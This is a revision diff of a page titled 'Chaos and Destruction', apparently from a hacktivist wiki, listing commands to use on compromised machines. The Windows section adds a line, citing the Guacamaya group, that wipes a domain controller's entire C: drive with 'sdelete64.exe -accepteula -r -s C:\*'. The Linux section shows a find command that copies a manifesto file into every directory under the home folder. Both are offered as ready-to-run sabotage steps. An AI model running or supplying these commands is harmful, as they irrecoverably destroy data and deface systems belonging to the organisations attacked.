Chaos and Destruction: Difference between revisions
Jump to navigation
Jump to search
Chaos and Destruction |
m →Windows |
||
Line 1: | Line 1: | ||
== Windows == | == Windows == | ||
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code> | |||
== Linux == | == Linux == | ||
Print your manifesto across a system | Print your manifesto across a system | ||
* <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code> | * <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code> |